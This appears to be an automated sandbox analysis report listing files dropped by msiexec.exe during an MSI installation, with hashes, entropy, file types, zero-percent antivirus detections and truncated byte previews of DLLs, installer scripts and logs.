                                                                  SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                  MD5:20C782EB64C81AC14C83A853546A8924
                                                                  SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                  SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                  SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):388064
                                                                  Entropy (8bit):6.407392408414975
                                                                  Encrypted:false
                                                                  SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                  MD5:20C782EB64C81AC14C83A853546A8924
                                                                  SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                  SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                  SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):388064
                                                                  Entropy (8bit):6.407392408414975
                                                                  Encrypted:false
                                                                  SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                  MD5:20C782EB64C81AC14C83A853546A8924
                                                                  SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                  SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                  SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):878560
                                                                  Entropy (8bit):6.452749824306929
                                                                  Encrypted:false
                                                                  SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                                                                  MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                                                                  SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                                                                  SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                                                                  SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):780768
                                                                  Entropy (8bit):6.387720196228063
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                  MD5:573F5E653258BF622AE1C0AD118880A2
                                                                  SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                  SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                  SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):780768
                                                                  Entropy (8bit):6.387720196228063
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                  MD5:573F5E653258BF622AE1C0AD118880A2
                                                                  SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                  SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                  SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):388064
                                                                  Entropy (8bit):6.407392408414975
                                                                  Encrypted:false
                                                                  SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                  MD5:20C782EB64C81AC14C83A853546A8924
                                                                  SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                  SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                  SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):780768
                                                                  Entropy (8bit):6.387720196228063
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                  MD5:573F5E653258BF622AE1C0AD118880A2
                                                                  SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                  SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                  SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1340
                                                                  Entropy (8bit):5.627061652562754
                                                                  Encrypted:false
                                                                  SSDEEP:24:bgd277vBu6gV5pSeY3Qa3SZpUGYDhiSrNTzLOd1/:bY2773gaJaBYD8SrNTzLOz
                                                                  MD5:5CEDBAEB9602D1B1D82C6D01D74F9505
                                                                  SHA1:F8B85B42E0789BF3863E8A3610BC76BFF8B9C767
                                                                  SHA-256:48DEB3B5D5B9B895E8AC36F6C0B61EB1E0C0158FDB48E286FBB163BC181F9117
                                                                  SHA-512:8840D98C428E1C86112395CE67AF419D1BF4DEE5799DF57800946CD50BCC352CEF4D8CF4EF56AE09B8D8B9CD04427AAC816CCFAEB03943D356F93C1B2844CDDE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:...@IXOS.@.....@0H.V.@.....@.....@.....@.....@.....@......&.{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}..PONTUAIS.LPR..M. .C.o.n.t.r.a.t.o. .U.K.....m.s.i..@.....@.....@.....@........&.{A87EF50E-3A28-4D4C-B48A-303CB4E8A206}.....@.....@.....@.....@.......@.....@.....@.......@......PONTUAIS.LPR......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{5CFC1B52-790D-4E7B-820A-AE59F8D84600}9.C:\Users\user\AppData\Roaming\PONTUAIS.LPR\PONTUAIS.LPR\.@.......@.....@.....@......&.{A25C57E5-4B3C-4AF9-985E-06C18ED1FBDF}..01:\Software\PONTUAIS.LPR\PONTUAIS.LPR\Version.@.......@.....@.....@......&.{CBE6D541-C45C-49FA-B523-C2EBC6C9F1FD}M.01:\Software\PONTUAIS.LPR\{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".9.C:\Users\user\AppData\Roaming\PONTUAIS.LPR\PONTUAIS.LPR\.@........WriteRegistryValues..Wri
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):780768
                                                                  Entropy (8bit):6.387720196228063
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                  MD5:573F5E653258BF622AE1C0AD118880A2
                                                                  SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                  SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                  SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.1657562588185766
                                                                  Encrypted:false
                                                                  SSDEEP:12:JSbX72Fjc6AGiLIlHVRpFh/7777777777777777777777777vDHFBMnmSS9Lql0G:JxQI5BgmtRF
                                                                  MD5:0EFF9D54EDBEA9AEDAB852B9CD7E30EA
                                                                  SHA1:74C0179261C945C0D8A0C8B4108ABBD4CA1E1D5D
                                                                  SHA-256:0A90D7697CA93B153A5951680780ABEE2DAC22F4916E302466BC50A6F5AB4091
                                                                  SHA-512:1E8EB74ECFD9BEA969811F48A61EEB9AD7189E19F9D6E4B01C30B1D1C31EBCCA33C56B8A7DB58088C17BD4C421B8C89E09473F77DBA7C4DE2A45F11999851E3E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):24576
                                                                  Entropy (8bit):1.838862932633631
                                                                  Encrypted:false
                                                                  SSDEEP:96:Jh51MnT07zNGWcGzkCnnk87K4G8GWcG05:V1cWxGWcGzrnDG8GWcG0
                                                                  MD5:5618B1C26DB67432B5805061CE39F192
                                                                  SHA1:A186C7062DC48824BC1EC1336AAEFE7FDC75EDA5
                                                                  SHA-256:937583DC37362FCF60FE535DF82E66F580C85F84F311B3026C8B8E37A3D2F4DB
                                                                  SHA-512:22253728EC6AEBAEF83447C1BC96A78F4CFC01877715656F4834CD7BE506D6C72879C6C3D63316844BFE84550209EAEC8F87E19C9CDDEDA5F8A9D11BB3E6E8BD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):192827
                                                                  Entropy (8bit):5.392014326254811
                                                                  Encrypted:false
                                                                  SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFB:i0LVlAD
                                                                  MD5:5FF4B9678D2539C5A992E0BBD6C4816B
                                                                  SHA1:926B6A365BF3D1C71D18D0E0848A260A38829533
                                                                  SHA-256:737C04D9C0FCF30E1A5A27EFC93B1AC58B660FF371F8BD0AFF5A84907D99420E
                                                                  SHA-512:16D6423C77D4D18C1DA22A55CB66593E85527CCFC0801AF615B0C3CB3D5A3E32E37E44803108886CEA3109F21FCFE1033D5D6EF9A168B1A8FBB1E6A92DD634FF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):1.2063072313962357
                                                                  Encrypted:false
                                                                  SSDEEP:96:XBOIQT58t7zNGWcGzkCnnk87K4G8GWcG05:ROIQ96xGWcGzrnDG8GWcG0
                                                                  MD5:56345E16DBFBE83381A96AC236B95160
                                                                  SHA1:2EC4F6EA539371D2936B38932246681341E4A44D
                                                                  SHA-256:2316310E830A11540FD45136C5BF6A62BB391F9F2EC8239BC8A05AC730BC1993
                                                                  SHA-512:B490FE1997C2BEAA744E77B64AB3653684EA090F65C166A0F65E9FEBA3B633F323FC8F0AE004F0E5D767831227AFD8D85082C6CBCF134DE24FF3F3179EA50189
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):24576
                                                                  Entropy (8bit):1.838862932633631
                                                                  Encrypted:false
                                                                  SSDEEP:96:Jh51MnT07zNGWcGzkCnnk87K4G8GWcG05:V1cWxGWcGzrnDG8GWcG0
                                                                  MD5:5618B1C26DB67432B5805061CE39F192
                                                                  SHA1:A186C7062DC48824BC1EC1336AAEFE7FDC75EDA5
                                                                  SHA-256:937583DC37362FCF60FE535DF82E66F580C85F84F311B3026C8B8E37A3D2F4DB
                                                                  SHA-512:22253728EC6AEBAEF83447C1BC96A78F4CFC01877715656F4834CD7BE506D6C72879C6C3D63316844BFE84550209EAEC8F87E19C9CDDEDA5F8A9D11BB3E6E8BD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):1.2063072313962357
                                                                  Encrypted:false
                                                                  SSDEEP:96:XBOIQT58t7zNGWcGzkCnnk87K4G8GWcG05:ROIQ96xGWcGzrnDG8GWcG0
                                                                  MD5:56345E16DBFBE83381A96AC236B95160
                                                                  SHA1:2EC4F6EA539371D2936B38932246681341E4A44D
                                                                  SHA-256:2316310E830A11540FD45136C5BF6A62BB391F9F2EC8239BC8A05AC730BC1993
                                                                  SHA-512:B490FE1997C2BEAA744E77B64AB3653684EA090F65C166A0F65E9FEBA3B633F323FC8F0AE004F0E5D767831227AFD8D85082C6CBCF134DE24FF3F3179EA50189
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):0.0733827427216334
                                                                  Encrypted:false
                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOBMnX2S/hduPUwltwVky6lq:2F0i8n0itFzDHFBMnmSS9Lq
                                                                  MD5:F1396FC9B928021A745AFBD491BD4E74
                                                                  SHA1:C51E3EECF5CAE79E8115B84228377FD248AF070F
                                                                  SHA-256:B4E406A5887B4173DDFAC12F751909BBC2346911CDD0CAC996E900A3614E8659
                                                                  SHA-512:743285759E5EC24373F5CFDF73754EB01BA1BDD70C61873E2213325F85AF93D339FAE2667548645E7C8EDFDC84FFA0F44E37909EEC6DACFCB3DEBE4AE654A806
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):24576
                                                                  Entropy (8bit):1.838862932633631
                                                                  Encrypted:false
                                                                  SSDEEP:96:Jh51MnT07zNGWcGzkCnnk87K4G8GWcG05:V1cWxGWcGzrnDG8GWcG0
                                                                  MD5:5618B1C26DB67432B5805061CE39F192
                                                                  SHA1:A186C7062DC48824BC1EC1336AAEFE7FDC75EDA5
                                                                  SHA-256:937583DC37362FCF60FE535DF82E66F580C85F84F311B3026C8B8E37A3D2F4DB
                                                                  SHA-512:22253728EC6AEBAEF83447C1BC96A78F4CFC01877715656F4834CD7BE506D6C72879C6C3D63316844BFE84550209EAEC8F87E19C9CDDEDA5F8A9D11BB3E6E8BD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):73728
                                                                  Entropy (8bit):0.30474998060671865
                                                                  Encrypted:false
                                                                  SSDEEP:48:XWDqRT2WDSDCSKWDSDtWDSDCSKWDSDwAEKgCygDTkP8xqo8x4swXGcp4ru2xBxY+:XWSGWcGUGWcGzkCnnk87K4G4L7
                                                                  MD5:251A694E192BA782E04FE03D5CBBAA1F
                                                                  SHA1:38C819173E7E5F2A145F279BF0C7E9C930D07287
                                                                  SHA-256:82E53025F0D05CB758E46C88D348E440336760A0A803FF9F4E1F8F54A95840E3
                                                                  SHA-512:75DDC57A0C2D81DBBA57086F85ECE7B0C27A9DE626E71AB92FC887C9E3C8B883BF1260176198E1A9AD20ACF1C249465081ADC792DA3A6E95A2A0D1614EF39682
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):1.2063072313962357
                                                                  Encrypted:false
                                                                  SSDEEP:96:XBOIQT58t7zNGWcGzkCnnk87K4G8GWcG05:ROIQ96xGWcGzrnDG8GWcG0
                                                                  MD5:56345E16DBFBE83381A96AC236B95160
                                                                  SHA1:2EC4F6EA539371D2936B38932246681341E4A44D
                                                                  SHA-256:2316310E830A11540FD45136C5BF6A62BB391F9F2EC8239BC8A05AC730BC1993
                                                                  SHA-512:B490FE1997C2BEAA744E77B64AB3653684EA090F65C166A0F65E9FEBA3B633F323FC8F0AE004F0E5D767831227AFD8D85082C6CBCF134DE24FF3F3179EA50189
